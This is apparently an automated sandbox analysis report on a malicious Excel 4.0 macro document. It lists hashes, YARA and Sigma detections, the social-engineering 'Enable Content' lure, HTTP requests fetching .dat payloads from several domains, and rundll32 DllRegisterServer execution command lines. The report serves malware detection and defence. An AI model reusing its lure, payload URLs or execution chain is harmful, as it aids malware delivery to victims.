Play interactive tour

Edit tour

Analysis Report Complaint-447781983-02182021.xls

Overview

General Information

Sample Name:	Complaint-447781983-02182021.xls
Analysis ID:	356654
MD5:	60f845a847e771a59b97d456c494f69d
SHA1:	bf79e4535e5d15cfbd4c6eb2fa2d086703ad81d6
SHA256:	c44df560766b2a3f60adba4ef6448e266a3036e19fc1631ae9ada22628447319
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malicious Excel 4.0 Macro

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Sigma detected: Microsoft Office Product Spawning Windows Shell

Yara detected hidden Macro 4.0 in Excel

Document contains embedded VBA macros

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 920 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

rundll32.exe (PID: 2920 cmdline: rundll32 ..\JDFR.hdfgr,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2944 cmdline: rundll32 ..\JDFR.hdfgr1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2356 cmdline: rundll32 ..\JDFR.hdfgr2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2860 cmdline: rundll32 ..\JDFR.hdfgr3,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 3040 cmdline: rundll32 ..\JDFR.hdfgr4,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
Complaint-447781983-02182021.xls	SUSP_EnableContent_String_Gen	Detects suspicious string that asks to enable active content in Office Doc	Florian Roth	0xadf2:$e1: Enable Editing 0xae3c:$e1: Enable Editing 0x158cc:$e1: Enable Editing 0x15916:$e1: Enable Editing 0x20083:$e1: Enable Editing 0x200cd:$e1: Enable Editing 0xae5a:$e2: Enable Content 0x15934:$e2: Enable Content 0x200eb:$e2: Enable Content
Complaint-447781983-02182021.xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 920, ProcessCommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, ProcessId: 2920

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://pathinanchilearthmovers.com/eznwcdhx/44250596245254600000.dat

Avira URL Cloud: Label: malware

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown

HTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.22:49168 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Jump to behavior

Source: global traffic

DNS query: name: rzminc.com

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 138.36.237.100:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 72.52.227.180:80

Networking:

Source: Joe Sandbox View

IP Address: 138.36.237.100 138.36.237.100

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic	HTTP traffic detected: GET /xklyulyijvn/44250596245254600000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rzminc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /eznwcdhx/44250596245254600000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pathinanchilearthmovers.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xjzpfwc/44250596245254600000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jugueterialatorre.com.arConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fdzgprclatqo/44250596245254600000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rzminc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /otmchxmxeg/44250596245254600000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: biblicalisraeltours.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /xklyulyijvn/44250596245254600000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rzminc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /eznwcdhx/44250596245254600000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pathinanchilearthmovers.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xjzpfwc/44250596245254600000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jugueterialatorre.com.arConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fdzgprclatqo/44250596245254600000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rzminc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /otmchxmxeg/44250596245254600000.dat HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: biblicalisraeltours.comConnection: Keep-Alive

Source: rundll32.exe, 00000004.00000002.2133949382.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2126985833.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117694762.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115119309.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109184895.0000000001B20000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: rzminc.com

Source: rundll32.exe, 00000004.00000002.2133949382.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2126985833.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117694762.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115119309.0000000001B90000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000004.00000002.2133949382.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2126985833.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117694762.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115119309.0000000001B90000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000004.00000002.2134118625.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2127149732.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2118561626.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115344237.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109379570.0000000001D07000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000004.00000002.2134118625.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2127149732.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2118561626.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115344237.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109379570.0000000001D07000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2134118625.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2127149732.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2118561626.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115344237.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109379570.0000000001D07000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000004.00000002.2134118625.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2127149732.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2118561626.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115344237.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109379570.0000000001D07000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2133949382.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2126985833.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117694762.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115119309.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109184895.0000000001B20000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000004.00000002.2134118625.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2127149732.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2118561626.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115344237.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109379570.0000000001D07000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000004.00000002.2133949382.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2126985833.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117694762.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115119309.0000000001B90000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000008.00000002.2109184895.0000000001B20000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443

Source: unknown

HTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary:

Found malicious Excel 4.0 Macro

Show sources

Source: Complaint-447781983-02182021.xls

Initial sample: urlmon

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing, please click Enabk 14 from the yellow bar above f y-t."\|\| I xa I 15 " lnn\|\| I F?
Source: Screenshot number: 8	Screenshot OCR: Enable Editing, please click Enable Content 14 from the yellow bar above 15 16 17 ,, WHY I CANN
Source: Screenshot number: 8	Screenshot OCR: Enable Content 14 from the yellow bar above 15 16 17 ,, WHY I CANNOTOPEN THIS DOCUMENT? 19 20
Source: Document image extraction number: 2	Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 2	Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 8	Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
Source: Document image extraction number: 8	Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? m You are using IDS or And

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: Complaint-447781983-02182021.xls

Initial sample: EXEC

Source: Complaint-447781983-02182021.xls

OLE indicator, VBA macros: true

Source: Complaint-447781983-02182021.xls, type: SAMPLE

Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal84.expl.evad.winXLS@11/13@6/4

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\A3CE0000

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRBC7B.tmp

Jump to behavior

Source: Complaint-447781983-02182021.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel

Show sources

Source: Yara match

File source: Complaint-447781983-02182021.xls, type: SAMPLE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting21	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	File and Directory Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution23	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	System Information Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Rundll321	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol13	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting21	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://biblicalisraeltours.com/otmchxmxeg/44250596245254600000.dat	0%	Avira URL Cloud	safe
http://jugueterialatorre.com.ar/xjzpfwc/44250596245254600000.dat	0%	Avira URL Cloud	safe
http://rzminc.com/fdzgprclatqo/44250596245254600000.dat	0%	Avira URL Cloud	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://rzminc.com/xklyulyijvn/44250596245254600000.dat	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://pathinanchilearthmovers.com/eznwcdhx/44250596245254600000.dat	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
rzminc.com	72.52.227.180	true	false	unknown
biblicalisraeltours.com	68.66.216.42	true	false	unknown
crt.sectigo.com	91.199.212.52	true	false	unknown
jugueterialatorre.com.ar	138.36.237.100	true	false	unknown
pathinanchilearthmovers.com	162.241.80.6	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://biblicalisraeltours.com/otmchxmxeg/44250596245254600000.dat	false	Avira URL Cloud: safe	unknown
http://jugueterialatorre.com.ar/xjzpfwc/44250596245254600000.dat	false	Avira URL Cloud: safe	unknown
http://rzminc.com/fdzgprclatqo/44250596245254600000.dat	false	Avira URL Cloud: safe	unknown
http://rzminc.com/xklyulyijvn/44250596245254600000.dat	false	Avira URL Cloud: safe	unknown
http://pathinanchilearthmovers.com/eznwcdhx/44250596245254600000.dat	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000004.00000002.2134118625.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2127149732.0000000001D67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2118561626.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115344237.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109379570.0000000001D07000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	rundll32.exe, 00000008.00000002.2109184895.0000000001B20000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000004.00000002.2133949382.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2126985833.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117694762.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115119309.0000000001B90000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000004.00000002.2133949382.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2126985833.0000000001B80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117694762.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2115119309.0000000001B90000.00000002.00000001.sdmp	false		high
